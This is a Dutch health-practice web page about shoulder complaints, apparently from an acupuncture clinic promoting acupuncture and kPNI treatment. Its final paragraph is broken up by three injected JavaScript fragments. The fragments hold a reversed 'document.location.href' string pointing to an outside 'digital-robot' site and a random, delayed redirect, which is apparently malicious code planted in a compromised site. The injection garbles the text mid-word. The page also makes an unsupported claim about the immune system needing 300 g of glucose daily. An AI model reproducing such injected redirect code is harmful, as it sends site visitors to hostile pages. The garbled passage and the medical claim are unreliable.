//Schouderklachten
Schouderklachten 2017-12-08T12:27:20+01:00

Schouderklachten

Schouderklachten zijn veelgehoorde klachten in mijn centrum. Acute klachten zijn heftiger en van kortere duur dan chronische klachten. De pijn sluipt langzaam het lichaam binnen of wordt veroorzaakt door een trauma, bijvoorbeeld een val of een onverwachte beweging.

Bij een sluipend begin is overbelasting vaak de oorzaak. Eenzijdige bewegingen, een slecht functionerend bewegingsapparaat, nekproblemen, problemen in de borstkas of in de organen, hebben een negatief effect op de schouder. Wanneer het immuunsysteem door welke reden dan ook geactiveerd is, heeft het 300 gr glucose per dag nodig. Dit kan hij alleen maar voor elkaar krijgen door andere organen te verwaarlozen. Dit kunnen de pezen, gewrichtsbanden, slijmbeurzen of gewrichten zijn. Met als gevolg verhoogde blessure gevoeligheid, irritatie of zelfs ontstekingen.

Met acupunctuur zijn deze klachten goed te behandelen. Maar naast lokale behandeling, onderzoek ik ook de tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totale gesteldheid. Soms zijn schouderklachten te herleiden tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tot mentale factobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toren, zoals stress en/of immuunreactie. Behandeling met kPNI kan hier dan goede resultaten bieden.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak.